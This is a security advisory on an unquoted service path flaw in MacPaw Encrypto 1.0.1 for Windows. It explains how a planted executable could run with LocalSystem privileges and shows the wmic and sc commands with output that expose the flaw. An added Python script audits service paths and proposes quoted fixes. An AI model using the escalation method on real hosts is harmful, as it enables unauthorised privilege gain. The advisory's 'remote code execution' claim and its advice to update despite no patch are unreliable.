Vendor: Encrypto
By: Ismael Nava
CVSS: 6.2 (MEDIUM)
CWE: 428 (Unquoted Service Path)
Product Name: Encrypto
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Platforms Tested: Windows 10 64-bit
Year: 2020

MacPaw Encrypto 1.0.1 – ‘Encrypto Service’ Unquoted Service Path

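MacPaw Encrypto version 1.0.1 is vulnerable to an unquoted service path vulnerability. The 'Encrypto Service' binary path, C:\Program Files\Encrypto\Encrypto.Service.exe, contains a space and is registered without enclosing quotes, so Windows can resolve it to an executable at a shorter prefix of that path. This allows an attacker to escalate privileges by placing a malicious executable in a directory higher up the service path, under a name that Windows tries before the real service executable. When the service is started, the malicious executable will be executed instead, with the privileges of the service account (LocalSystem for this service). This can lead to remote code execution or other malicious activities.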

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of MacPaw Encrypto or ensure that the service path is quoted correctly. Additionally, users should regularly update their operating systems and use strong passwords for their user accounts.

Exploit-DB raw data:

# Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 03-19-2020
# Vendor Homepage: https://macpaw.com/encrypto
# Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092
# Tested Version: 1.0.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Encrypto Service   Encrypto.Service    C:\Program Files\Encrypto\Encrypto.Service.exe   Auto


C:\>sc qc "Encrypto.Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Encrypto.Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START  (DELAYED)
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Encrypto\Encrypto.Service.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Encrypto Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
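
The mitigation above asks for the service path to be quoted correctly. The following is an added example, not part of the Exploit-DB entry or of MacPaw's code: an audit helper that takes (service name, binary path) pairs, flags unquoted executables whose path contains a space, and produces the quoted value to set. Unlike the wmic/findstr filter, it also catches an unquoted executable followed by a quoted argument and ignores unquoted paths without spaces. The function names and all sample services except Encrypto.Service are constructed for illustration.

```python
import re

# Constructed sample (service name, binary path) pairs.
# Only the Encrypto.Service entry comes from the page; the rest are made up.
SAMPLE_SERVICES = [
    ("Encrypto.Service", r"C:\Program Files\Encrypto\Encrypto.Service.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\svc.exe" --run'),
    ("NoSpaceSvc", r"C:\Tools\agent.exe -k netsvcs"),
    ("ArgQuoteSvc", r'C:\Program Files\Vendor App\svc.exe -c "C:\cfg dir\a.ini"'),
    ("SysSvc", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]

# Heuristic (an assumption of this example): the executable ends at the first
# ".exe/.com/.bat/.cmd" that is followed by whitespace or end of string.
_EXE = re.compile(r"\.(exe|com|bat|cmd)(?=\s|$)", re.IGNORECASE)

def split_image_path(image_path):
    """Return (executable, arguments, was_quoted) for a service binary path."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:            # unbalanced quote: treat the rest as the executable
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    m = _EXE.search(s)
    if m is None:                # e.g. driver paths such as \SystemRoot\...\x.sys
        return s, "", False
    return s[:m.end()], s[m.end():].strip(), False

def is_unquoted_with_space(image_path):
    """True when the executable part is unquoted and contains a space (CWE-428)."""
    exe, _args, quoted = split_image_path(image_path)
    return (not quoted) and (" " in exe)

def quoted_form(image_path):
    """Binary path with the executable wrapped in quotes, arguments preserved."""
    exe, args, _quoted = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")

def audit(services):
    """List (name, corrected binary path) for every service that needs quoting."""
    return [(n, quoted_form(p)) for n, p in services if is_unquoted_with_space(p)]

if __name__ == "__main__":
    for name, fix in audit(SAMPLE_SERVICES):
        print(f"{name}: set binary path to {fix}")
```

The corrected string is the value the service's ImagePath entry under HKLM\SYSTEM\CurrentControlSet\Services\<service name> should hold; feed the function real pairs exported from the host being audited.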